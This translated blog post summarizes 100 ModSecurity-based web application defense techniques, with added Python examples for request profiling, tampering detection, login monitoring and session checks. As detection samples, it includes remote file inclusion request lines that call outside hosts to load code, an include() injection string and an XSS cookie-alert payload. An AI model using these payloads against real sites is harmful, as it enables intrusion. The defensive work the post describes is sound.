100 Techniques for Web Application Security Defense
How to defend a web application is a question every web security practitioner asks, and it is hard to answer well: it is easy to be either too superficial or too theoretical, and a thorough answer would fill a book. This article introduces a book that answers it nicely: Web Application Defender's Cookbook, an underrated book packed with practical substance. Although it is written around ModSecurity, the defensive techniques it describes are useful to any web security practitioner; it reads like a Sun Tzu's Art of War for web defense (amusingly, every chapter opens with a quotation from The Art of War). The book presents 100 techniques for defending web applications with ModSecurity, each illustrated with a real case, which makes them easy to grasp. Below are the 100 techniques together with my own comments (flames welcome :)).

1. Analyze HTTP request characteristics in real time: request method, parameter names, number of parameters, parameter length and parameter value type (numeric, alphabetic, email, URL or file path). Whitelist HTTP requests, or at least whitelist the URIs known to be vulnerable, to keep the rules accurate.
2. Verify a hash token to prevent data tampering, for example http://xxx.xxx.xxx/?p=4&rv_token=aafb509403bbf7d78c3c8fe1735d49f01b90eb64, where rv_token is verified on the server.
3. Install the OWASP ModSecurity Core Rule Set (CRS). The rule set has two modes: an independent detection mode and a collaborative detection mode (rule evaluation).
4. Convert Snort IDS rules into ModSecurity rules with the snort2modsec2.pl script, so that each layer is linked effectively into a barrier.
5. Use a Bayesian classification algorithm to distinguish malicious requests.
6. Enable HTTP audit logging at full granularity (record everything).
7. Enable HTTP audit logging at partial granularity, for example record only requests that receive a 4xx response code.
8. Enable HTTP audit logging but do not record requests for static resources.
9. Mask sensitive information in HTTP logs. Comment: the motivation is respect for user privacy, but many CDN vendors do not do this.
10. Forward server alerts via syslog to a central log platform; this is the log-collection stage of a distributed/collaborative defense system, for example feeding a SIEM for analysis.
11. Use AuditConsole, a friendlier ModSecurity audit management platform.
12. Passive vulnerability identification: read vulnerability databases (such as OSVDB) to identify vulnerabilities and defend against them.
13. Active vulnerability identification: run a scanner (such as Arachni) to identify vulnerabilities and defend against them.
14. Manually convert scanner results into defense rules.
15. Automatically convert scanner results into defense rules: the arachni2modsec.pl script converts an Arachni scan report into ModSecurity rules.
16. Call a scanner in real time (for example Arachni RPC) for defense.
17. Set a honeypot on a newly opened listening port.
18. Set a honeypot with fake robots.txt Disallow entries and fake 401 authentication challenges. Aside: there is in fact a "legitimate" search engine in China that does not comply with the robots protocol and crawls the Disallow paths.
19. Set a honeypot with fake HTML comments. Aside: attackers usually look through HTML comments for sensitive information (Burp Suite provides a "find comments" function), so adding a non-existent URI in a comment creates a honeypot that catches them.
20. Set a honeypot with fake hidden form fields: add a hidden form field such as debug; if an HTTP request carries this field, the request has attack intent.
21. Set a honeypot cookie.
22. Use an IP reputation library to look up information about the visitor's IP address. Aside: the MaxMind IP library; probably no one has heard of it.
23. Use an IP reputation library to identify malicious proxies.
24. Query an online RBL (real-time blacklist) such as sbl-xbl.spamhaus.org to identify malicious IP addresses, that is, the IP blacklist published by the international anti-spam organization, or call the open honeypot-based IP blacklist API http:BL (Project Honey Pot HTTP Blacklist) for IP reputation lookups.
25. Create your own RBL with jwall-rbld; https://jwall.org/ provides a number of Java web security tools.
26. Query URI blacklists such as URIBL and the Google Safe Browsing API to identify malicious URIs. Aside: BAT (Baidu, Alibaba, Tencent), Kingsoft and other large Internet companies have each opened up interfaces to their own malicious website databases.
27. Parse the HTTP request body on demand. Detection over the request body is very expensive, so add optimization limits such as a body length limit, whether a request body cached to the local file system is parsed (naxsi, for example, does not parse it) and whether XML entity types are parsed.
28. Identify request bodies that do not comply with the protocol specification. A request body that the protocol parser cannot parse may be malicious, for example a multipart form upload crafted in a malformed format to bypass restrictions on the uploaded file type.
29. Normalize Unicode encodings. Encoding bypasses are a major family of WAF evasion techniques; canonicalizing encodings with an encoding mapping table is a good idea.
30. Identify multiple encodings, for example double URL encoding.
31. Identify abnormal encodings by verifying that the encoding is canonical.
32. Identify abnormal HTTP request methods by whitelisting methods, for example allowing only GET, POST and HEAD.
33. Identify URI formats that do not comply with RFC 2616.
34. Identify HTTP request header anomalies, such as missing request headers, abnormal request header order and abnormal request header values.
35. Identify attacks through redundant parameters.
36. Identify attacks through missing parameters.
37. Identify attacks through duplicated parameters (HTTP parameter pollution, HPP). Aside: duplicated parameters also occur in normal applications. Why?!
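The following is an added example, not code from the book or from the original post: a per-URI request profile check in the spirit of techniques 1, 30 and 35 to 37 (and of the value length and type checks that follow). The profile for /article.php, the decode-pass threshold and the sample query strings are all constructed for the demo; a real deployment would derive the profile from the application's routing table or from observed legitimate traffic.

```python
"""Added example, not from the book or the original post: a per-URI request
profile check in the spirit of techniques 1, 30 and 35-37.  The profile,
thresholds and sample queries below are constructed for this demo."""
import re
from urllib.parse import unquote

# Constructed whitelist profile: which parameters each URI accepts and what
# each value must look like.
PROFILE = {
    "/article.php": {
        "required": {"id"},
        "optional": {"page"},
        "types": {"id": r"\d{1,8}", "page": r"\d{1,3}"},
        "max_len": 8,
    },
}

# One decode pass is normal for a URL-encoded value; a second pass that still
# changes the value means it was encoded more than once (double URL encoding).
MULTI_ENCODING_PASSES = 2


def canonicalize(value):
    """URL-decode until the value stops changing.
    Returns (decoded_value, number_of_passes_that_changed_it)."""
    passes = 0
    while passes < 8:                     # hard stop against pathological input
        decoded = unquote(value)
        if decoded == value:
            break
        value, passes = decoded, passes + 1
    return value, passes


def check_request(uri, query):
    """Return anomaly tags for one request; an empty list means it fits the profile."""
    profile = PROFILE.get(uri)
    if profile is None:
        return ["uri-not-whitelisted"]
    findings, seen = [], set()
    for part in (query.split("&") if query else []):
        raw_name, _, raw_value = part.partition("=")
        name = unquote(raw_name)
        if name in seen:                  # HTTP parameter pollution (technique 37)
            findings.append(f"duplicate-param:{name}")
        seen.add(name)
        if name not in profile["required"] and name not in profile["optional"]:
            findings.append(f"redundant-param:{name}")   # technique 35
            continue
        value, passes = canonicalize(raw_value)
        if passes >= MULTI_ENCODING_PASSES:              # technique 30
            findings.append(f"multiple-encoding:{name}")
        if len(value) > profile["max_len"]:              # technique 38
            findings.append(f"value-length:{name}")
        if not re.fullmatch(profile["types"][name], value):   # technique 39
            findings.append(f"value-type:{name}")
    for name in sorted(profile["required"] - seen):      # technique 36
        findings.append(f"missing-param:{name}")
    return findings


if __name__ == "__main__":
    # Constructed sample queries: a clean request, a double-encoded value,
    # a duplicated parameter, an over-long non-numeric value, a stray parameter.
    for q in ("id=42", "id=%2531", "id=1&id=2", "id=1%27%20OR%201%3D1", "page=2&debug=1"):
        print(q, "->", check_request("/article.php", q))
```

The decode loop is what turns technique 30 into something measurable: a value that keeps changing after the first unquote was encoded more than once, which legitimate browsers never do. Everything else is a plain whitelist comparison, which is why the profile has to be generated from the real application rather than hand-written for more than a handful of URIs.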
38. Identify attacks through abnormal parameter value length.
39. Identify attacks through abnormal parameter value character types; defend with a parameter value whitelist.
40. Identify HTTP response header anomalies, such as the 5xx error ratio, HTTP response splitting and malicious redirection.
41. Prevent information leakage through HTTP response headers: remove or forge service signature headers such as Server, X-Powered-By and X-AspNet-Version.
42. Parse the HTTP response body on demand. Detection over the response body is extremely expensive, so configure carefully which response bodies are parsed.
43. Detect web page tampering through title tampering: every defaced site is left with the attacker's mark.
44. Detect web page tampering through response body length anomalies: when page content is tampered with or the back-end database has been dumped, the response body size changes significantly. This method must be used with caution, since it false-alarms easily.
45. Detect web page tampering through dynamic content tampering of the response body: for example, injecting <script>alert(document.cookie);</script> makes a new JS tag appear in the response body, so attacks can be detected from the number of tags.
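The following is an added example, not code from the book or from the original post: the three response-body tampering checks of techniques 43 to 45 (title change, body length deviation, increased script tag count) run against a learned baseline. The baseline page, the two tampered variants and the 30% length tolerance are constructed for the demo.

```python
"""Added example, not from the book or the original post: response-body
tampering checks in the spirit of techniques 43-45 (title change, body length
deviation, injected script tags).  The baseline page, the tampered variants
and the tolerance are constructed for this demo."""
from html.parser import HTMLParser


class PageStats(HTMLParser):
    """Collects the <title> text and the number of <script> tags in a page."""

    def __init__(self):
        super().__init__()
        self.title, self.script_count, self._in_title = "", 0, False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_count += 1
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def profile_response(body):
    """Summarize one response body into the features the checks compare."""
    stats = PageStats()
    stats.feed(body)
    stats.close()
    return {"title": stats.title.strip(), "scripts": stats.script_count, "length": len(body)}


def detect_tampering(baseline, body, length_tolerance=0.3):
    """Compare a fresh response against the learned baseline for the same URL.
    Returns a list of findings; empty means nothing looks tampered."""
    current = profile_response(body)
    findings = []
    if current["title"] != baseline["title"]:                 # technique 43
        findings.append("title-changed")
    if current["scripts"] > baseline["scripts"]:              # technique 45
        findings.append("script-tag-count-increased")
    deviation = abs(current["length"] - baseline["length"]) / max(baseline["length"], 1)
    if deviation > length_tolerance:                          # technique 44 (noisy: tune the tolerance)
        findings.append("body-length-deviation")
    return findings


# Constructed pages: the known-good page, an injected variant and a defaced variant.
BASELINE_HTML = ('<html><head><title>Acme Shop</title><script src="/app.js"></script>'
                 '</head><body><h1>Welcome</h1><p>Today\'s offers are below.</p></body></html>')
INJECTED_HTML = BASELINE_HTML.replace("</body>", "<script>alert(document.cookie);</script></body>")
DEFACED_HTML = "<html><head><title>Owned</title></head><body>site defaced</body></html>"
BASELINE = profile_response(BASELINE_HTML)

if __name__ == "__main__":
    for label, page in (("baseline", BASELINE_HTML), ("injected", INJECTED_HTML), ("defaced", DEFACED_HTML)):
        print(label, "->", detect_tampering(BASELINE, page))
```

The baseline must be learned per URL and refreshed on every legitimate deployment, otherwise technique 44 fires on every content update; the title and script-count checks are far less noisy and are the ones worth alerting on first.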
46. Detect source code leakage in the response body, such as the php-cgi source code disclosure vulnerability CVE-2012-1823.
47. Detect information leakage in the response body, such as leaked absolute source paths and database information.
48. Detect attacks through abnormal response time; for example, time-based blind SQL injection with WAITFOR DELAY produces abnormal response times.
49. Detect user data leakage in the response body, for example credit card numbers.
50. Detect connection attempts to trojans, backdoors and webshells.
51. Monitor login attempts that use common account names such as admin, administrator, root and system.
52. Monitor horizontal brute forcing of the login endpoint: the same password tried against different usernames.
53. Monitor failed login attempts.
54. Monitor high-frequency login attempts.
55. Use a unified login failure message to avoid leaking useful information: telling the user whether the username or the password was wrong gives brute-forcers valid information.
56. Enable password complexity checks.
57. Analyze, within one session, the usernames used in login attempts to detect abnormal use of the login endpoint.
58. Detect session attacks based on the cookie value, including guessable session ID values (Burp Suite integrates a session token sequence analyzer).
59. Detect attacks in cookie fields, such as SQL injection in a cookie value.
60. Set a session validity period to defend against session fixation attacks.
61. Detect, within one session, a change in the GEO information of the requester's IP address.
62. Detect, within one session, a change in the requester's fingerprint.
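The following is an added example, not code from the book or from the original post: a login-traffic monitor in the spirit of techniques 51 to 54, run over a constructed batch of login events. The thresholds, the IP addresses and the events are all constructed; the monitor keeps only a truncated hash of each submitted password, never the password itself, which is enough to notice the same password being sprayed across many usernames.

```python
"""Added example, not from the book or the original post: monitoring of login
traffic in the spirit of techniques 51-54.  Thresholds and the sample events
are constructed; the monitor keeps only a truncated hash of each submitted
password, never the password itself."""
import hashlib
from collections import defaultdict

COMMON_ACCOUNTS = {"admin", "administrator", "root", "system"}
SPRAY_THRESHOLD = 3      # distinct usernames tried with one password from one IP
FAIL_THRESHOLD = 5       # failed attempts from one IP inside WINDOW_SECONDS
WINDOW_SECONDS = 60


def password_fingerprint(password):
    """Short hash used only to notice the *same* password reused across users."""
    return hashlib.sha256(password.encode()).hexdigest()[:16]


def login_event(ts, ip, username, password, success):
    return {"ts": ts, "ip": ip, "username": username,
            "pw_fp": password_fingerprint(password), "success": success}


def analyze_logins(events):
    """Return {ip: [tags]} for every source IP that shows suspicious login behaviour."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        tags = []
        evs.sort(key=lambda e: e["ts"])
        # technique 51: probing with well-known account names
        if any(e["username"].lower() in COMMON_ACCOUNTS for e in evs):
            tags.append("common-account-probe")
        # technique 52: horizontal brute force, one password against many users
        users_per_pw = defaultdict(set)
        for e in evs:
            users_per_pw[e["pw_fp"]].add(e["username"])
        if any(len(users) >= SPRAY_THRESHOLD for users in users_per_pw.values()):
            tags.append("horizontal-brute-force")
        # techniques 53/54: many failures inside a short sliding window
        fails = [e["ts"] for e in evs if not e["success"]]
        for i in range(len(fails) - FAIL_THRESHOLD + 1):
            if fails[i + FAIL_THRESHOLD - 1] - fails[i] <= WINDOW_SECONDS:
                tags.append("high-frequency-failures")
                break
        if tags:
            findings[ip] = tags
    return findings


# Constructed sample: a password spray, a probe for default accounts, one normal login.
SAMPLE_EVENTS = (
    [login_event(t, "203.0.113.5", user, "Summer2014", False)
     for t, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [login_event(10, "198.51.100.9", "admin", "secret1", False),
       login_event(12, "198.51.100.9", "root", "secret2", False),
       login_event(20, "192.0.2.7", "alice", "correct horse battery", True)]
)

if __name__ == "__main__":
    for ip, tags in analyze_logins(SAMPLE_EVENTS).items():
        print(ip, tags)
```

Grouping by source IP is the simplest key; a spray spread over many IPs needs the same password fingerprint grouped globally instead, which is a one-line change to the users_per_pw aggregation.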
Fingerprinting is generally used by anti-fraud systems to identify a user; it covers the visitor's screen size, time zone, language settings and browser plug-ins.
63. Detect non-ASCII characters in the request, for example the NULL character %00. Aside: look at the naxsi basic rule file; 90% of its rules detect non-ASCII characters.
64. Detect directory traversal attacks.
65. Detect abnormal access to website resources. Against horizontal privilege escalation over resource access-control URLs, an encrypted token (such as a URL hash) defends against arbitrary resource access, as it does against vertical privilege escalation operations, for example: https://www.REDACTED.com/Cust/cust_5.php/222557/20040216?rv_token=abfb508403bbf7d78c3f8de1735d49f01b90eb71
66. Detect SQL injection attacks. There are generally three SQL injection defense methods: (1) SQL keyword filtering, (2) SQL semantic analysis, (3) Naive Bayes anomaly classification (I plan to write a separate post on this).
67. Detect remote file inclusion. A URI with any of the following is very likely an attack request: an IP address, such as /.php?libdir=http://89.238.174.14/fx.txt; a PHP function, such as /?id={${include("http://xxx.xx.xx/fx.txt")}}; multiple question marks, such as /a.php?libdir=http://xxx.xx.xx/cgi?; a host inconsistent with the Host header, such as /a.php?libdir=http://www.example.com.
68. Detect operating system command execution.
69. Detect HTTP request smuggling (HRS) attacks.
70. Detect HTTP response splitting.
71. Detect XML attacks such as XPath injection.
72. Defend with a Content Security Policy (CSP).
73. Detect XSS attacks. There are generally three XSS defense methods: (1) XSS keyword filtering, (2) the X-XSS-Protection header, (3) a JavaScript sandbox.
74. Detect CSRF attacks. CSRF defense method: an encrypted token.
75. Defend against UI redressing (clickjacking). Clickjacking defense methods: (1) X-Frame-Options, (2) frame-busting JavaScript.
76. Defend against man-in-the-middle trojans. Such trojans generally intercept HTTP requests and forge the login interface to steal accounts. The defense against this kind of phishing is inspired by the file integrity tool Tripwire: JavaScript injected into the response body appends the MD5 value of the login page so that page integrity can be verified.
77. Limit the size of uploaded files to prevent server denial of service caused by uploading large files.
78. Limit the number of uploaded files to prevent server denial of service caused by excessive file uploads.
79. Integrate a virus scanner (such as ClamAV) to check whether uploaded files are malicious.
80. Identify HTTP DDoS (CC) attacks. The best-known attack tools are Low Orbit Ion Cannon (LOIC) and High Orbit Ion Cannon (HOIC). Note that, as with technique 8, only dynamic pages are monitored, because requests for static resources are usually cached at CDN nodes and never reach the origin site.
81. Identify slow HTTP DDoS attacks; the attack tool is slowloris.
82. Detect CSRF attacks by timing: when the victim loads a page containing the malicious image tag, the forged GET request is sent immediately, so the interval between the two requests is very short; check whether consecutive requests arrive within a very short interval.
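The following is an added example, not code from the book or from the original post: the four remote file inclusion indicators listed under technique 67, applied to a single request line and its Host header. The sample request lines reuse the illustrative URLs given above; the Host header values and the regular expressions are constructed for the demo.

```python
"""Added example, not from the book or the original post: the four remote file
inclusion indicators listed under technique 67, applied to one request.  The
sample request lines reuse the page's own illustrative URLs; the Host header
values are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# A URL whose host is a bare IPv4 address (first indicator).
IPV4_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[/:?]|$)")
# PHP code smuggled into a parameter value (second indicator).
PHP_CODE = re.compile(r"\$\{|\b(?:include|require|eval|system|passthru)\s*\(", re.I)


def rfi_indicators(request_uri, host_header):
    """Return the technique-67 indicators present in a request line.

    request_uri is the raw path+query as the server saw it; host_header is the
    value of the Host header.  An empty list means none of the four indicators fired."""
    findings = []
    _, _, query = request_uri.partition("?")
    if "?" in query:                                   # third indicator: a second '?'
        findings.append("multiple-question-marks")
    own_host = host_header.split(":")[0].lower()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if IPV4_URL.search(value):
            findings.append(f"ip-url-in-param:{name}")
        if PHP_CODE.search(value):
            findings.append(f"php-code-in-param:{name}")
        if value.lower().startswith(("http://", "https://")):
            remote = urlsplit(value).hostname            # fourth indicator: host mismatch
            if remote and remote != own_host:
                findings.append(f"foreign-host-in-param:{name}")
    return findings


# Constructed check: the page's examples against a server whose Host is www.example.com.
SAMPLES = [
    "/.php?libdir=http://89.238.174.14/fx.txt",
    '/?id={${include("http://xxx.xx.xx/fx.txt")}}',
    "/a.php?libdir=http://xxx.xx.xx/cgi?",
    "/a.php?libdir=http://www.example.com",
    "/article.php?id=42",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(uri, "->", rfi_indicators(uri, "www.example.com"))
```

The fourth indicator is the one worth weighting most: a parameter that names a host other than the site's own is rarely legitimate, whereas a second question mark or an IP literal occasionally shows up in benign redirect parameters, so score them rather than block on each alone.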
83. Detect abnormal HTTP request order. Automated attacks usually minimize the operation steps; refer to techniques 2 and 65 and add a token to prevent automated attacks.
84. Identify abnormal access to specific website resources; abnormal access to a specific resource often means an attack has occurred. For example, in the CSRF worm attack on Sina Weibo, the interface for posting Weibo messages was called automatically.
85. Correlate multiple HTTP requests by enabling the collaborative detection mode (rule evaluation), for example triggering when events accumulate for a single IP address/session.
86. Dynamically enable WAF log auditing, for example enable audit logging when a request arrives from a blacklisted IP address.
87. Email the details of WAF collaborative defense to the webmaster, either by calling an external mail-sending script or via the AuditConsole platform (mentioned in technique 11).
88. Share WAF event information with other security components through request headers for correlated analysis. When a low-severity attack is caught, blocking outright is not ideal; instead share the WAF event information with other security components so that a reasonable response can be chosen. Passing the WAF event information in an HTTP request header is a good solution (this method is called request header tagging).
89. Redirect attack requests to a user-friendly custom blocking page.
90. Drop the attacker's network connection; this measure is often used against denial-of-service attacks, for example CC attacks.
91. Use IP blacklist blocking tools to block access by malicious users; generally User-Agent and IP address are combined to block them.
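The following is an added example, not code from the book or from the original post: an HMAC-based URL token of the kind techniques 2, 65 and 83 rely on, with a signer and a verifier. The book's rv_token examples are 40 hex characters; this version uses HMAC-SHA256 (64 hex characters), and the secret, the parameter names and the sample URL are constructed.

```python
"""Added example, not from the book or the original post: an HMAC-based URL
token in the spirit of techniques 2, 65 and 83.  The secret, parameter names
and sample URLs are constructed; HMAC-SHA256 is this example's choice."""
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode, urlsplit

SECRET = b"constructed-demo-secret-rotate-in-production"   # assumption: server-side key
TOKEN_PARAM = "rv_token"


def _canonical(path, params):
    """Path plus sorted parameters, so that parameter order does not affect the token."""
    return path + "?" + urlencode(sorted(params))


def sign_url(path, params, secret=SECRET):
    """Return path?params&rv_token=<hmac> for a list of (name, value) pairs."""
    digest = hmac.new(secret, _canonical(path, params).encode(), hashlib.sha256).hexdigest()
    return path + "?" + urlencode(list(params) + [(TOKEN_PARAM, digest)])


def verify_url(url, secret=SECRET):
    """True only if the URL carries exactly one rv_token matching its path and parameters."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    tokens = [v for k, v in pairs if k == TOKEN_PARAM]
    if len(tokens) != 1:            # missing or duplicated token: reject
        return False
    rest = [(k, v) for k, v in pairs if k != TOKEN_PARAM]
    expected = hmac.new(secret, _canonical(parts.path, rest).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tokens[0])   # constant-time comparison


if __name__ == "__main__":
    link = sign_url("/Cust/cust_5.php", [("cust", "222557"), ("date", "20040216")])
    print(link)
    print("genuine:", verify_url(link))
    print("tampered:", verify_url(link.replace("cust=222557", "cust=222558")))
```

Because the token covers the path as well as every parameter, a user cannot change a customer id to reach another customer's record (technique 65) and a script cannot skip the page that issues the link (technique 83); the WAF only needs the secret, not any application state, to verify it.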
Common blacklist blocking tools include jwall-rbld, jwall AuditConsole, blacklist and SnortSam.
92. Dynamically enable tiered defense based on IP GEO information: for example, on discovering a large number of attackers from country X, enable advanced defense against country X.
93. Delay the response to a request to slow automated attacks and give the defender time to respond.
94. Return a fake "attack succeeded" response page to confuse the attacker and give the defender time to cope with the attack; this integrates the honeypot defense philosophy.
95. Proxy the attack request to a honeypot.
96. When a session anomaly is detected, force the attacker to log out; for example, when the User-Agent changes during a session, force the attacker to log out of the server.
97. When a block occurs during an attack, lock the attacker's account for a period of time.
98. Use JavaScript injection to block traffic attacks (such as CC attacks).
99. Use CAPTCHAs to block automated (machine) attacks such as automatic registration, automatic spam posting and other robot behaviour. Aside: the CAPTCHA server itself must be robust enough, so that this measure does not become ineffective when a denial-of-service attack is triggered.
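The following is an added example, not code from the book or from the original post: a small session monitor that combines techniques 61, 62, 96 and 97, forcing a logout when the country, User-Agent or browser fingerprint changes within a session and locking the account for a period afterwards. The prefix-to-country table is a constructed stand-in for an IP geolocation database such as MaxMind's, and the lock duration is an assumption.

```python
"""Added example, not from the book or the original post: a session monitor in
the spirit of techniques 61, 62, 96 and 97.  The GEO lookup table is a
constructed stand-in for an IP geolocation database, and the lock duration is
an assumption."""

# Constructed prefix -> country table (documentation address ranges only).
GEO_PREFIXES = {"192.0.2.": "country-A", "198.51.100.": "country-B", "203.0.113.": "country-C"}
LOCK_SECONDS = 300        # technique 97: how long an account stays locked after a block


def geo_lookup(ip):
    """Map an IP address to a country label using the constructed prefix table."""
    for prefix, country in GEO_PREFIXES.items():
        if ip.startswith(prefix):
            return country
    return "unknown"


class SessionMonitor:
    """Tracks per-session origin and browser identity and reacts to changes."""

    def __init__(self):
        self.sessions = {}       # session_id -> {"user", "country", "ua", "fp"}
        self.locked_until = {}   # username -> unix time at which the lock expires

    def observe(self, ts, session_id, user, ip, user_agent, fingerprint):
        """Return 'ok', 'locked', or 'force-logout:<reasons>' for one request.

        fingerprint is the client-side fingerprint string (screen size, time zone,
        language, plug-ins) that the application collects; its format is free."""
        if self.locked_until.get(user, 0) > ts:
            return "locked"
        country = geo_lookup(ip)
        current = self.sessions.get(session_id)
        if current is None:                       # first request of the session
            self.sessions[session_id] = {"user": user, "country": country,
                                         "ua": user_agent, "fp": fingerprint}
            return "ok"
        reasons = []
        if current["ua"] != user_agent:           # technique 96
            reasons.append("user-agent-changed")
        if current["country"] != country:         # technique 61
            reasons.append("geo-changed")
        if current["fp"] != fingerprint:          # technique 62
            reasons.append("fingerprint-changed")
        if not reasons:
            return "ok"
        del self.sessions[session_id]             # force logout: the session is gone
        self.locked_until[user] = ts + LOCK_SECONDS
        return "force-logout:" + ",".join(reasons)


if __name__ == "__main__":
    # Constructed walk-through: a normal session, then a hijacked one from elsewhere.
    m = SessionMonitor()
    fp = "1920x1080/UTC+8/zh-CN"
    print(m.observe(0, "s1", "alice", "192.0.2.10", "Mozilla/5.0 A", fp))
    print(m.observe(9, "s1", "alice", "198.51.100.7", "curl/7.0", fp))
    print(m.observe(20, "s2", "alice", "192.0.2.10", "Mozilla/5.0 A", fp))
```

Country granularity keeps technique 61 usable on mobile networks, where the IP address itself changes constantly; comparing the raw IP instead would log everyone out several times a day.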
100. Integrate BeEF (Browser Exploitation Framework) to analyze malicious user requests.

Looking across these 100 defensive techniques, the following tools, specifications and methods appear: WAF (web application firewall), Snort, OSVDB, honeypots, Arachni, BeEF, ClamAV, Tripwire (a file integrity verification tool whose idea carries over to the web to prevent tampering with HTTP request data, forged phishing pages and automated request submission), RBL (real-time IP blacklists, IP reputation libraries), URIBL and the Google Safe Browsing API (malicious URL libraries), JavaScript sandboxes, SIEM (security information and event management platforms), SQL lexical analyzers, the HTTP RFC specification, encoding mapping tables and the Naive Bayes classification algorithm. It is easy to see that web security defense is a whole: the various components (checkpoints) must be linked effectively to form a barrier. Defensive methods are not strictly divided by field; client security techniques can be used for the web, and vice versa. If you cannot find one complete solution to a security problem, combine several imperfect defenses at the same time: three cobblers with their wits combined equal Zhuge Liang.